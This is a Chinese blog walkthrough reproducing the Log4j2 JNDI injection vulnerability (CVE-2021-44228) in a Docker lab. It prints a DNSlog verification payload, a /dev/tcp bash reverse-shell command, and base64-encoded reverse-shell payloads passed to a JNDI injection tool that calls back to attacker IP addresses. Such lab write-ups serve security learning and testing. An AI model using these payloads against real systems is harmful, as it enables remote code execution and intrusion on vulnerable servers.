CVE-2021-44228 Apache Log4j2 远程代码执行漏洞

红太狼 2023-09-25 20:04 8阅读 0赞

#### Apache Log4j 2 是Java语言的日志处理套件，使用极为广泛。在其2.0到2.14.1版本中存在一处JNDI注入漏洞，攻击者在可以控制日志内容的情况下，通过传入类似于`${jndi:ldap://evil.com/example}`的lookup用于进行JNDI注入，执行任意代码。 ####

#### 漏洞验证 ####

开启docker镜像，进入8983端口

![a4e0eb1a30f843eabdf82024c78aa030.png][]

选择该Poc

${jndi:ldap://${sys:java.version}.xxx.dnslog.cn}
    ##################################################
    sys:java.bersion 大致意思就是一个系统命令，可以查看Java版本

构造一个dns连接地址

![b3c9707f1b3d4304831e3dba732e5031.png][]

将地址填入上方的poc中并进行利用

![0891a1f2f6ab4275aa86adc2950a5e62.png][]

进入到该页面后，返回Dnslog平台查看数据返回，成功发现java版本,漏洞验证成功

![82696db4cdba4f869832f2475b7eaf16.png][]

#### 漏洞利用 ####

下载JNDI注入工具,

![e88c03cced484a1fa93887000febe0cd.png][]

利用漏洞需要用到的反弹shell的命令

bash -i >& /dev/tcp/ip/6666 0>&1
    ip就是要反弹到的主机的ip
    6666是监听端口

再对这条命令进行base64编码

![2d28ca32c9784dd18a4774439a86dcf0.png][]

加密完成后，构造payload

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMzMvNjY2NiAwPiYxCgo=}|{base64,-d}|{bash,-i}" -A "192.168.1.33"
    #-C后面的参数是要执行的命令以及编码方式，-A后面就是对应ip地址；base64,-d 表示用base64来解码

启动rmi和ldap服务器

![2169391df2124e86a00e323f901729b3.png][]

可以看到这个工具为我们生成了几个有恶意流量导向的地址

此时开启6666端口监听

![747b7380980f4ce5aa4aaa80e406b2c9.png][]

此时返回刚才的网站进行JNDI注入，构造url

![1dc4b4c2591641548e22b8fa2236f6d1.png][]

发现本该重定向到恶意地址的网站回显连接失败

![6101e499026441f18048c0192b508424.png][]

参考了多篇文章仍然无果

一筹莫展时发现

更换了解码平台之后就能利用成功了

重新构造

java -jar /root/桌面/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTAyLjY2LzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "172.16.102.66"

返回刚才的页面将恶意的流量导向url填进去

![38bb6fdf153a4c9dbe4b8b25957d7fa5.png][]返回kali，发现导向成功

![aee0c2f3b34b4857a113e39a66d9ffc4.png][]

查看监听的端口并发送whoami指令

漏洞利用成功

![5b7275e5af8341c495d085afe3dc0765.png][]

[a4e0eb1a30f843eabdf82024c78aa030.png]: https://img-blog.csdnimg.cn/a4e0eb1a30f843eabdf82024c78aa030.png
[b3c9707f1b3d4304831e3dba732e5031.png]: https://img-blog.csdnimg.cn/b3c9707f1b3d4304831e3dba732e5031.png
[0891a1f2f6ab4275aa86adc2950a5e62.png]: https://img-blog.csdnimg.cn/0891a1f2f6ab4275aa86adc2950a5e62.png
[82696db4cdba4f869832f2475b7eaf16.png]: https://img-blog.csdnimg.cn/82696db4cdba4f869832f2475b7eaf16.png
[e88c03cced484a1fa93887000febe0cd.png]: https://img-blog.csdnimg.cn/e88c03cced484a1fa93887000febe0cd.png
[2d28ca32c9784dd18a4774439a86dcf0.png]: https://img-blog.csdnimg.cn/2d28ca32c9784dd18a4774439a86dcf0.png
[2169391df2124e86a00e323f901729b3.png]: https://img-blog.csdnimg.cn/2169391df2124e86a00e323f901729b3.png
[747b7380980f4ce5aa4aaa80e406b2c9.png]: https://img-blog.csdnimg.cn/747b7380980f4ce5aa4aaa80e406b2c9.png
[1dc4b4c2591641548e22b8fa2236f6d1.png]: https://img-blog.csdnimg.cn/1dc4b4c2591641548e22b8fa2236f6d1.png
[6101e499026441f18048c0192b508424.png]: https://img-blog.csdnimg.cn/6101e499026441f18048c0192b508424.png
[38bb6fdf153a4c9dbe4b8b25957d7fa5.png]: https://img-blog.csdnimg.cn/38bb6fdf153a4c9dbe4b8b25957d7fa5.png
[aee0c2f3b34b4857a113e39a66d9ffc4.png]: https://img-blog.csdnimg.cn/aee0c2f3b34b4857a113e39a66d9ffc4.png
[5b7275e5af8341c495d085afe3dc0765.png]: https://img-blog.csdnimg.cn/5b7275e5af8341c495d085afe3dc0765.png